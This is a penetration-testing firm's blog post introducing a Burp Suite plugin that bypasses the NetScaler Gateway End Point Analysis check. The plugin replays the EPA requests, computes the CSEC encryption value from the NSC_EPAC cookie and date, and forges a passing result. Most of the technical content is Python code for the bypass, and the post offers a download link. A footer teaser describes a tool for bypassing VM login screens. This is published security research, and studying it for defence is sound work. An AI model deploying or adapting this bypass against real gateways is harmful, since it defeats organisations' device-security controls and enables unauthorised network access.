NetScaler EPA Bypass Burp plugin

Published on Oct. 13, 2019 by Nikos Vassakis
imagensecforcepost.png

“On NetScaler Gateway, End Point Analysis (EPA) can be configured to check if a user device meets certain security requirements and accordingly allow access of internal resources to the user.”

Based on Lucky0x0D’s research. “The NetScaler does this by running a client on the user’s machine. […]. It connects to the NetScaler, receives a list of conditions, checks those conditions on the client device and then sends the NetScaler Gateway a result of pass or fail.

On the NetScaler this EPA communication can be configured to be in plaintext or be encrypted. When the NetScaler is configured without ‘Client Security Encryption’ the EPA check is trivial to bypass.”

This Burp plugin is a fork of the aforementioned code that will listen for “Pre-Authentication Endpoint Analysis” requests and reply to the server that these were passed.

For more information about what takes place under the hood, I suggest you read the paper:

The plugin details

After the plugin is loaded. It listens for redirections to “/epa/epa.html” (from the proxy or repeater). The response to this request will have the “NSC_EPAC” cookie that is used to construct the encryption key.

if response_info.getStatusCode() == 302:
    headers=response_info.getHeaders()
    if "Location: /epa/epa.html" in headers:
        NSC_EPAC=self.get_NSC_EPAC_from_response(response_info)

It then performs the 3 requests needed to get get details of the checks and to reply with a success message:

epatype_response=self.do_request("/epatype", headers, service_info)
#[...]
epaq_response=self.do_request("/epaq", headers, service_info)
#[...]
epas_response=self.do_request("/epas", headers, service_info)

The encryption key is calculated by the cookie and date parameters on the requests and it is then used to encrypt the response to the server.

CSEC_response=self.get_CSEC_response(str(NSC_EPAC_cookie), date, str(service_info.getHost()), CSEC)
if CSEC_response:
    headers.append("CSEC: "+CSEC_response)
    epas_response=self.do_request("/epas", headers, service_info)

If the above steps are successful, the user is redirected to the login page, without the need to run the client software

if self.bypassNSEPA(NSC_EPAC, currentMessage.getHttpService()):
  # If successful bypass, redirect to /vpn/index.html
  response=self._helpers.bytesToString(currentMessage.getResponse())
  response=response.replace("/epa/epa.html", "/vpn/index.html")
  currentMessage.setResponse(self._helpers.stringToBytes(response))

Download Link

You may also be interested in...

imagensecforcepost.png
Nov. 14, 2012

VMInjector – DLL Injection tool to unlock guest VMs

VMInjector is a tool designed to bypass OS login authentication screens of major operating systems running on VMware Workstation/Player, by using direct memory manipulation.

See more
imagensecforcepost.png
Dec. 9, 2008

Why penetration test? Is firewall not enough?

A few days ago someone visited our website after searching in Google “why penetration test? firewall is not secure enough?”. We are going to dedicate this post just to that topic.

See more